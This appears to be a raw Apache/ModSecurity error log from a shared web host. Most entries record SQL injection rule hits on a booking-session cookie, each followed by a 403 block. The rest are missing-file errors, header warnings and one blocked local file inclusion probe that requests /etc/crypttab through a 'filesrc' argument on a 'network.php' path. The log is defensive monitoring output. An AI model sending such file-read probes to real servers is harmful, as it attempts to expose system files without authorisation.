[Tue May 12 03:59:53.662861 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJmLvMumyrWMfSu7q_LAAAANg"]
[Tue May 12 03:59:53.863809 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/root"] [unique_id "agKJmTue9Sp-pIv_Bb6lZwAAAUw"]
[Tue May 12 03:59:53.864020 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/root"] [unique_id "agKJmTue9Sp-pIv_Bb6lZwAAAUw"]
[Tue May 12 03:59:53.864216 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmTue9Sp-pIv_Bb6lZwAAAUw"]
[Tue May 12 03:59:54.138439 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmrvMumyrWMfSu7q_LgAAANg"]
[Tue May 12 03:59:54.138672 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmrvMumyrWMfSu7q_LgAAANg"]
[Tue May 12 03:59:54.717233 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJmrvMumyrWMfSu7q_LgAAANg"]
[Tue May 12 03:59:54.911798 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/src"] [unique_id "agKJmjue9Sp-pIv_Bb6laQAAAUw"]
[Tue May 12 03:59:54.912003 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/src"] [unique_id "agKJmjue9Sp-pIv_Bb6laQAAAUw"]
[Tue May 12 03:59:54.912199 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmjue9Sp-pIv_Bb6laQAAAUw"]
[Tue May 12 03:59:55.220020 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJm7vMumyrWMfSu7q_MAAAANg"]
[Tue May 12 03:59:55.220221 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJm7vMumyrWMfSu7q_MAAAANg"]
[Tue May 12 03:59:55.821529 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJm7vMumyrWMfSu7q_MAAAANg"]
[Tue May 12 03:59:56.130508 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/source"] [unique_id "agKJnDue9Sp-pIv_Bb6lawAAAUw"]
[Tue May 12 03:59:56.130710 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/source"] [unique_id "agKJnDue9Sp-pIv_Bb6lawAAAUw"]
[Tue May 12 03:59:56.130913 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnDue9Sp-pIv_Bb6lawAAAUw"]
[Tue May 12 03:59:56.481421 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnLvMumyrWMfSu7q_MQAAANg"]
[Tue May 12 03:59:56.481644 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnLvMumyrWMfSu7q_MQAAANg"]
[Tue May 12 03:59:57.095613 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJnLvMumyrWMfSu7q_MQAAANg"]
[Tue May 12 03:59:57.291948 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/system"] [unique_id "agKJnTue9Sp-pIv_Bb6lbAAAAUw"]
[Tue May 12 03:59:57.292154 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/system"] [unique_id "agKJnTue9Sp-pIv_Bb6lbAAAAUw"]
[Tue May 12 03:59:57.292368 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnTue9Sp-pIv_Bb6lbAAAAUw"]
[Tue May 12 03:59:57.544246 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnbvMumyrWMfSu7q_MgAAANg"]
[Tue May 12 03:59:57.544468 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnbvMumyrWMfSu7q_MgAAANg"]
[Tue May 12 03:59:58.122004 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJnbvMumyrWMfSu7q_MgAAANg"]
[Tue May 12 03:59:58.794798 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/install.php"] [unique_id "agKJnjue9Sp-pIv_Bb6lbQAAAUw"]
[Tue May 12 03:59:58.795001 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/install.php"] [unique_id "agKJnjue9Sp-pIv_Bb6lbQAAAUw"]
[Tue May 12 03:59:58.795203 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJnjue9Sp-pIv_Bb6lbQAAAUw"]
[Tue May 12 03:59:59.124970 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJn7vMumyrWMfSu7q_NAAAANg"]
[Tue May 12 03:59:59.125177 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJn7vMumyrWMfSu7q_NAAAANg"]
[Tue May 12 03:59:59.713003 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJn7vMumyrWMfSu7q_NAAAANg"]
[Tue May 12 04:00:01.137806 2026] [:error] [pid 1730207:tid 1730229] [client 185.191.171.12:19502] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 04:00:02.919152 2026] [:error] [pid 1691274:tid 1691291] [client 74.7.243.217:44384] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:00:15.518694 2026] [:error] [pid 1730207:tid 1730216] [client 74.7.243.217:34978] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=m
[Tue May 12 04:00:28.530169 2026] [:error] [pid 1709071:tid 1709098] [client 74.7.243.217:56272] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:00:31.094079 2026] [security2:error] [pid 1707624:tid 1707706] [client 49.51.233.46:56666] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/belladone/"] [unique_id "agKJv7OxS7i6i_mT2NLgUQAAAFg"]
[Tue May 12 04:00:41.642887 2026] [:error] [pid 1707624:tid 1707695] [client 74.7.243.217:46996] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:00:54.015371 2026] [:error] [pid 1730175:tid 1730192] [client 74.7.243.217:42896] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 04:01:06.309914 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:64988] ModSecurity: Warning. Matched phrase "etc/crypttab" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/crypttab found within ARGS:filesrc: /etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKJ4no6NvB9WXx5V-6QzwAAARc"]
[Tue May 12 04:01:06.310626 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:64988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKJ4no6NvB9WXx5V-6QzwAAARc"]
[Tue May 12 04:01:06.400023 2026] [security2:error] [pid 1730175:tid 1730200] [client 216.73.216.110:64988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKJ4no6NvB9WXx5V-6QzwAAARc"]
[Tue May 12 04:01:06.485664 2026] [:error] [pid 1709071:tid 1709089] [client 74.7.243.217:35858] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=f
[Tue May 12 04:01:14.283799 2026] [security2:error] [pid 1695975:tid 1695983] [client 49.51.196.42:37664] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agKJ6tVI9ymHBxup74-hCgAAAIU"]
[Tue May 12 04:01:18.694732 2026] [:error] [pid 1695975:tid 1695987] [client 74.7.243.217:42980] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
